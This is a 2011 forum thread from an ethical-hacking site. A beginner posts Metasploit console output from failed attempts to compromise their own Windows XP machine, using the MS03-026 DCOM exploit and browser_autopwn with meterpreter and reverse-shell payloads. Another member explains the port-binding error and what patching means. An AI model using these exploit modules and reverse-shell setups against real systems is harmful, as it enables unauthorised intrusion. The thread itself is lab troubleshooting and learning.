Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 34 guests online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow problem with metasploit
EH-Net
May 19, 2013, 02:15:50 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Poll
Question: what is this problem from??
hope it be the AV lol - 0 (0%)
not the firewall - 0 (0%)
Total Voters: 0

Pages: [1]   Go Down
  Print  
Author Topic: problem with metasploit  (Read 6571 times)
0 Members and 1 Guest are viewing this topic.
zigzago
Newbie
*
Offline Offline

Posts: 3


View Profile
« on: May 19, 2011, 02:49:07 PM »

i have a problem in connecting to my other PC even when i disable my AV & firewall it have XP OS and my other pc opensuse.
1-  i tried 2 connect using dcom with options..
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.125    yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.125    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

the result :
msf exploit(ms03_026_dcom) > exploit

    Started bind handler
    Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.125[135] ...
    Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.125[135] ...
    Sending exploit ...
    Exploit completed, but no session was created.




2-when i connect with
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.1.161    yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


i got :
msf auxiliary(browser_autopwn) > [-] Exploit exception: Permission denied - bind(2)
[-] Failed to start exploit module multi/browser/firefox_escape_retval

    Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/java_calendar_deserialize
    Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/java_trusted_chain
    Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/mozilla_compareto
    Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/mozilla_navigatorjava
    Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/opera_configoverwrite
    Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module multi/browser/opera_historysearch
    Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module osx/browser/safari_metadata_archive
    Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/apple_quicktime_marshaled_punk
    Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/apple_quicktime_rtsp
    Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/apple_quicktime_smil_debug
    Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/enjoysapgui_comp_download
    Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/ie_createobject
    Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/mozilla_interleaved_write
    Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/ms03_020_ie_objecttype
    Starting exploit windows/browser/ms10_090_ie_css_clip with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/ms10_090_ie_css_clip
    Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/ms11_003_ie_css_import
    Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/winzip_fileview
    Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
    [-] Exploit exception: Permission denied - bind(2)
    [-] Failed to start exploit module windows/browser/wmi_admintools
    Starting handler for windows/meterpreter/reverse_tcp on port 3333
    Starting handler for generic/shell_reverse_tcp on port 6666
    Started reverse handler on 192.168.1.161:3333
    Starting the payload handler...
    Starting handler for java/meterpreter/reverse_tcp on port 7777
    Started reverse handler on 192.168.1.161:6666
    Starting the payload handler...
    Started reverse handler on 192.168.1.161:7777
    Starting the payload handler...
    --- Done, found 0 exploit modules
    [-] No exploits, check your MATCH and EXCLUDE settings
    Cleaning up exploits...
Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1892


View Profile WWW
« Reply #1 on: May 19, 2011, 03:58:15 PM »

What system are you running metasploit from? Is your XP system fully patched? Do you already have something running/listening on port 80?
Logged
zigzago
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #2 on: May 20, 2011, 06:47:41 AM »

iam still a beginer i just watched vivek series,iam running metasploit from opensuse11.4
i didn't check on the openports but anyway i think the 1st method with dcom should work if port 80 is not open about xp pached or not wat u mean by pached sry still level 0-1 in hacking and os stuff lol   Cheesy
Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1892


View Profile WWW
« Reply #3 on: May 20, 2011, 03:18:23 PM »

Oh okay. Well, you need to probably read up on some more stuff first. For one, dcom doesn't have anything to do with port 80. If you have something running on your opensuse box, using port 80, then metasploit can't bind to that port (it's already in use) or you need higher privileges. By 'patched' I mean that an update that fixes the vulnerability has been applied - in which case the exploit won't work.

You should read through the Metasploit Unleashed (among other things) training over at Offensive Security.
Logged
zigzago
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #4 on: May 20, 2011, 04:37:40 PM »

thank u alot it was really usefull 2 talk 2 u i know it still long way 2 get advanced in this way but i can say its 1st step thank you again.
Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.065 seconds with 24 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.